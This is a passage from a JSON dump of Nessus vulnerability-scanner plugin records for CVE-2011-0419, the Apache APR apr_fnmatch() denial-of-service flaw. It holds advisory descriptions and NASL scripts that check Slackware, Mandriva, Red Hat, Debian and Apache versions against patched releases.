pkgarch:\"i486\", pkgnum:\"1_slack12.0\")) flag++;\nif (slackware_check(osver:\"12.0\", pkgname:\"apr-util\", pkgver:\"1.3.11\", pkgarch:\"i486\", pkgnum:\"1_slack12.0\")) flag++;\n\nif (slackware_check(osver:\"12.1\", pkgname:\"apr\", pkgver:\"1.4.4\", pkgarch:\"i486\", pkgnum:\"1_slack12.1\")) flag++;\nif (slackware_check(osver:\"12.1\", pkgname:\"apr-util\", pkgver:\"1.3.11\", pkgarch:\"i486\", pkgnum:\"1_slack12.1\")) flag++;\n\nif (slackware_check(osver:\"12.2\", pkgname:\"apr\", pkgver:\"1.4.4\", pkgarch:\"i486\", pkgnum:\"1_slack12.2\")) flag++;\nif (slackware_check(osver:\"12.2\", pkgname:\"apr-util\", pkgver:\"1.3.11\", pkgarch:\"i486\", pkgnum:\"1_slack12.2\")) flag++;\n\nif (slackware_check(osver:\"13.0\", pkgname:\"apr\", pkgver:\"1.4.4\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", pkgname:\"apr-util\", pkgver:\"1.3.11\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"apr\", pkgver:\"1.4.4\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"apr-util\", pkgver:\"1.3.11\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"apr\", pkgver:\"1.4.4\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", pkgname:\"apr-util\", pkgver:\"1.3.11\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"apr\", pkgver:\"1.4.4\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"apr-util\", pkgver:\"1.3.11\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"apr\", pkgver:\"1.4.4\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", pkgname:\"apr-util\", pkgver:\"1.3.11\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"apr\", pkgver:\"1.4.4\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"apr-util\", pkgver:\"1.3.11\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"apr\", pkgver:\"1.4.4\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"apr-util\", pkgver:\"1.3.11\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"apr\", pkgver:\"1.4.4\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"apr-util\", pkgver:\"1.3.11\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:21:07", "description": "It was discovered that the apr_fnmatch() function used an unconstrained recursion when processing patterns with the '*' wildcard. An attacker could use this flaw to cause an application using this function, which also accepted untrusted input as a pattern for matching (such as an httpd server using the mod_autoindex module), to exhaust all stack memory or use an excessive amount of CPU time when performing matching (CVE-2011-0419).\n\nPackages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more:\nhttp://store.mandriva.com/product_info.php?cPath=149 products_id=490\n\nThe updated packages have been patched to correct this issue.", "cvss3": {}, "published": "2011-05-16T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : apr (MDVSA-2011:084)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:lib64apr-devel", "p-cpe:/a:mandriva:linux:lib64apr1", "p-cpe:/a:mandriva:linux:libapr-devel", "p-cpe:/a:mandriva:linux:libapr1", "cpe:/o:mandriva:linux:2009.0", "cpe:/o:mandriva:linux:2010.0", "cpe:/o:mandriva:linux:2010.1"], "id": "MANDRIVA_MDVSA-2011-084.NASL", "href": "https://www.tenable.com/plugins/nessus/53908", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2011:084. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53908);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-0419\");\n script_bugtraq_id(47820);\n script_xref(name:\"MDVSA\", value:\"2011:084\");\n\n script_name(english:\"Mandriva Linux Security Advisory : apr (MDVSA-2011:084)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the apr_fnmatch() function used an\nunconstrained recursion when processing patterns with the '*'\nwildcard. An attacker could use this flaw to cause an application\nusing this function, which also accepted untrusted input as a pattern\nfor matching (such as an httpd server using the mod_autoindex module),\nto exhaust all stack memory or use an excessive amount of CPU time\nwhen performing matching (CVE-2011-0419).\n\nPackages for 2009.0 are provided as of the Extended Maintenance\nProgram. Please visit this link to learn more:\nhttp://store.mandriva.com/product_info.php?cPath=149 products_id=490\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64apr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64apr1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libapr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libapr1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64apr-devel-1.3.3-2.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64apr1-1.3.3-2.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libapr-devel-1.3.3-2.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libapr1-1.3.3-2.2mdv2009.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2010.0\", cpu:\"x86_64\", reference:\"lib64apr-devel-1.3.9-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"x86_64\", reference:\"lib64apr1-1.3.9-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"i386\", reference:\"libapr-devel-1.3.9-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"i386\", reference:\"libapr1-1.3.9-1.1mdv2010.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64apr-devel-1.4.2-1.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64apr1-1.4.2-1.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libapr-devel-1.4.2-1.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libapr1-1.4.2-1.1mdv2010.2\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:20:53", "description": "Updated apr packages that fix one security issue are now available for Red Hat Enterprise Linux 4, 5, and 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Apache Portable Runtime (APR) is a portability library used by the Apache HTTP Server and other projects. It provides a free library of C data structures and routines.\n\nIt was discovered that the apr_fnmatch() function used an unconstrained recursion when processing patterns with the '*' wildcard. An attacker could use this flaw to cause an application using this function, which also accepted untrusted input as a pattern for matching (such as an httpd server using the mod_autoindex module), to exhaust all stack memory or use an excessive amount of CPU time when performing matching. (CVE-2011-0419)\n\nRed Hat would like to thank Maksymilian Arciemowicz for reporting this issue.\n\nAll apr users should upgrade to these updated packages, which contain a backported patch to correct this issue. Applications using the apr library, such as httpd, must be restarted for this update to take effect.", "cvss3": {}, "published": "2011-05-12T00:00:00", "type": "nessus", "title": "RHEL 4 / 5 / 6 : apr (RHSA-2011:0507)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:apr", "p-cpe:/a:redhat:enterprise_linux:apr-debuginfo", "p-cpe:/a:redhat:enterprise_linux:apr-devel", "p-cpe:/a:redhat:enterprise_linux:apr-docs", "cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:4.8", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:5.6", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.0"], "id": "REDHAT-RHSA-2011-0507.NASL", "href": "https://www.tenable.com/plugins/nessus/53874", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:0507. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53874);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-0419\");\n script_xref(name:\"RHSA\", value:\"2011:0507\");\n\n script_name(english:\"RHEL 4 / 5 / 6 : apr (RHSA-2011:0507)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated apr packages that fix one security issue are now available for\nRed Hat Enterprise Linux 4, 5, and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe Apache Portable Runtime (APR) is a portability library used by the\nApache HTTP Server and other projects. It provides a free library of C\ndata structures and routines.\n\nIt was discovered that the apr_fnmatch() function used an\nunconstrained recursion when processing patterns with the '*'\nwildcard. An attacker could use this flaw to cause an application\nusing this function, which also accepted untrusted input as a pattern\nfor matching (such as an httpd server using the mod_autoindex module),\nto exhaust all stack memory or use an excessive amount of CPU time\nwhen performing matching. (CVE-2011-0419)\n\nRed Hat would like to thank Maksymilian Arciemowicz for reporting this\nissue.\n\nAll apr users should upgrade to these updated packages, which contain\na backported patch to correct this issue. Applications using the apr\nlibrary, such as httpd, must be restarted for this update to take\neffect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-0419\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:0507\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apr-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apr-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/05/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2011:0507\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"apr-0.9.4-25.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"apr-devel-0.9.4-25.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", reference:\"apr-1.2.7-11.el5_6.4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"apr-devel-1.2.7-11.el5_6.4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"apr-docs-1.2.7-11.el5_6.4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"apr-docs-1.2.7-11.el5_6.4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"apr-docs-1.2.7-11.el5_6.4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"apr-1.3.9-3.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"apr-debuginfo-1.3.9-3.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"apr-devel-1.3.9-3.el6_0.1\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apr / apr-debuginfo / apr-devel / apr-docs\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:21:07", "description": "According to its banner, the version of Apache 2.2.x running on the remote host is prior to 2.2.18. It is, therefore, affected by a denial of service vulnerability due to an error in the apr_fnmatch() function of the bundled APR library. \n\nIf mod_autoindex is enabled and has indexed a directory containing files whose filenames are long, an attacker can cause high CPU usage with a specially crafted request. \n\nNote that the remote web server may not actually be affected by this vulnerability. Nessus did not try to determine whether the affected module is in use or to check for the issue itself.", "cvss3": {}, "published": "2011-05-13T00:00:00", "type": "nessus", "title": "Apache 2.2.x < 2.2.18 APR apr_fnmatch DoS", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2018-06-29T00:00:00", "cpe": ["cpe:/a:apache:http_server"], "id": "APACHE_2_2_18.NASL", "href": "https://www.tenable.com/plugins/nessus/53896", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(53896);\n script_cvs_date(\"Date: 2018/06/29 12:01:03\");\n script_version(\"1.20\");\n\n script_cve_id(\"CVE-2011-0419\");\n script_bugtraq_id(47820);\n script_xref(name:\"Secunia\", value:\"44574\");\n\n script_name(english:\"Apache 2.2.x < 2.2.18 APR apr_fnmatch DoS\");\n script_summary(english:\"Checks version in Server response header\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server may be affected by a denial of service\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apache 2.2.x running on the\nremote host is prior to 2.2.18. It is, therefore, affected by a denial\nof service vulnerability due to an error in the apr_fnmatch() function\nof the bundled APR library. \n\nIf mod_autoindex is enabled and has indexed a directory containing\nfiles whose filenames are long, an attacker can cause high CPU usage\nwith a specially crafted request. \n\nNote that the remote web server may not actually be affected by this\nvulnerability. Nessus did not try to determine whether the affected\nmodule is in use or to check for the issue itself.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://archive.apache.org/dist/httpd/CHANGES_2.2.18\");\n script_set_attribute(attribute:\"see_also\", value:\"http://httpd.apache.org/security/vulnerabilities_22.html#2.2.18\");\n script_set_attribute(attribute:\"see_also\", value:\"http://securityreason.com/achievement_securityalert/98\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache version 2.2.18 or later. Alternatively, ensure that\nthe 'IndexOptions' configuration option is set to 'IgnoreClient'.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/13\");\n script_set_attribute(attribute:\"plugin_type\", value: \"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"apache_http_version.nasl\");\n script_require_keys(\"installed_sw/Apache\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"install_func.inc\");\n\nget_install_count(app_name:\"Apache\", exit_if_zero:TRUE);\nport = get_http_port(default:80);\ninstall = get_single_install(app_name:\"Apache\", port:port, exit_if_unknown_ver:TRUE);\n\n# Check if we could get a version first, then check if it was\n# backported\nversion = get_kb_item_or_exit('www/apache/'+port+'/version', exit_code:1);\nbackported = get_kb_item_or_exit('www/apache/'+port+'/backported', exit_code:1);\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"Apache\");\nsource = get_kb_item_or_exit('www/apache/'+port+'/source', exit_code:1);\n\n# Check if the version looks like either ServerTokens Major/Minor\n# was used\nif (version =~ '^2(\\\\.2)?$') exit(1, \"The banner from the Apache server listening on port \"+port+\" - \"+source+\" - is not granular enough to make a determination.\");\n\nif (version !~ \"^\\d+(\\.\\d+)*$\") exit(1, \"The version of Apache listening on port \" + port + \" - \" + version + \" - is non-numeric and, therefore, cannot be used to make a determination.\");\n\nfixed_ver = '2.2.18';\nif (version =~ '^2\\\\.2' && ver_compare(ver:version, fix:fixed_ver) == -1)\n{\n if (report_verbosity > 0)\n {\n report = \n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_ver + '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"Apache\", port, install[\"version\"]);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:20:23", "description": "A flaw was found in the APR library, which could be exploited through Apache HTTPD's mod_autoindex. If a directory indexed by mod_autoindex contained files with sufficiently long names, a remote attacker could send a carefully crafted request which would cause excessive CPU usage. This could be used in a denial of service attack.", "cvss3": {}, "published": "2011-05-16T00:00:00", "type": "nessus", "title": "Debian DSA-2237-1 : apr - denial of service", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:apr", "cpe:/o:debian:debian_linux:5.0", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DSA-2237.NASL", "href": "https://www.tenable.com/plugins/nessus/53900", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2237. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53900);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2011-0419\");\n script_bugtraq_id(47820, 47929);\n script_xref(name:\"DSA\", value:\"2237\");\n\n script_name(english:\"Debian DSA-2237-1 : apr - denial of service\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the APR library, which could be exploited through\nApache HTTPD's mod_autoindex. If a directory indexed by mod_autoindex\ncontained files with sufficiently long names, a remote attacker could\nsend a carefully crafted request which would cause excessive CPU\nusage. This could be used in a denial of service attack.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/apr\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2011/dsa-2237\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the apr packages and restart the apache2 server.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.2.12-5+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.2-6+squeeze1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apr\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"apr\", reference:\"1.2.12-5+lenny3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libapr1\", 